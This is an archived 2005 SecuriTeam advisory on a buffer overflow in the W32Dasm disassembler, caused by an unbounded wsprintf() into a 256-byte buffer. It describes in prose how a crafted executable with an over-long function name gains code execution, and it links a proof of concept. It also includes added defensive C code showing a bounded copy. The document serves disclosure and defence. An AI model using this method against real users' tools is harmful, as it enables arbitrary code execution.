[NT] W32Dasm Local Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 01/25/05
To: list@securiteam.com Date: 25 Jan 2005 18:48:47 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
W32Dasm Local Buffer Overflow
------------------------------------------------------------------------
SUMMARY
<http://www.expage.com/page/w32dasm> W32Dasm is "a cool and famous
disassembler/debugger developed by URSoft. It has tons of functions and,
also if it is no longer supported by long time, it is still widely used by
a lot of people".
The program uses the wsprintf() function to copy the names of the
imported/exported functions of the analyzed file into a buffer of only 256
bytes. Because wsprintf() does not bound the copy to the size of the
destination, an over-long function name in a crafted executable overflows
the buffer and allows an attacker to make the program execute arbitrary
code.
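As an added illustration (not code from the advisory or from W32Dasm itself), the following C shows a bounded replacement for the unbounded wsprintf() copy described above: the symbol name is read from a mapped PE section without trusting the file to contain a NUL terminator, and is rejected rather than copied when it would not fit in the 256-byte buffer. The section bytes, offsets and function names are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* The advisory describes a 256-byte destination buffer. */
#define NAME_BUF 256

/* Hardened replacement for an unbounded wsprintf()/sprintf() copy.
 * blob/bloblen is a mapped PE section and off is the offset of an
 * import/export name inside it. The name is scanned without trusting
 * the file to contain a NUL terminator, and is rejected (not silently
 * truncated) if it would not fit in dst.
 * Returns the name length, or -1 on a malformed or oversized name. */
int read_symbol_name(const char *blob, size_t bloblen, size_t off,
                     char *dst, size_t dstlen)
{
    if (off >= bloblen)
        return -1;                 /* name starts outside the section */
    size_t avail = bloblen - off;
    size_t n = 0;
    while (n < avail && blob[off + n] != '\0')
        n++;                       /* bounded scan, never past section end */
    if (n == avail)
        return -1;                 /* no terminator before section end */
    if (n >= dstlen)
        return -1;                 /* needs n+1 bytes: would overflow dst */
    memcpy(dst, blob + off, n + 1);
    return (int)n;
}

/* Constructed sample (not from the advisory): a 600-byte section filled
 * with 'a', with a NUL placed at name_len, or no NUL at all when
 * name_len >= 600. Reads the name at offset 0 into a 256-byte buffer. */
int demo_read(size_t name_len)
{
    char section[600];
    char dst[NAME_BUF];
    memset(section, 'a', sizeof section);
    if (name_len < sizeof section)
        section[name_len] = '\0';
    return read_symbol_name(section, sizeof section, 0, dst, sizeof dst);
}

int main(void)
{
    printf("255-byte name: %d\n", demo_read(255));  /* fits: 255 */
    printf("256-byte name: %d\n", demo_read(256));  /* rejected: -1 */
    printf("unterminated:  %d\n", demo_read(600));  /* rejected: -1 */
    return 0;
}
```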
DETAILS
Vulnerable Systems:
* W32Dasm version 8.93 and prior
Exploit:
Exploiting the bug is very simple: all you need is an executable in which
you modify the name of an imported or exported function.
Luigi has written a very simple proof-of-concept that overwrites the
return address with 0xdeadc0de:
http://aluigi.altervista.org/poc/w32dasmbof.disasm_me
ADDITIONAL INFORMATION
The information has been provided by Luigi Auriemma (aluigi@autistici.org).
The original article can be found at:
http://aluigi.altervista.org/adv/w32dasmbof-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.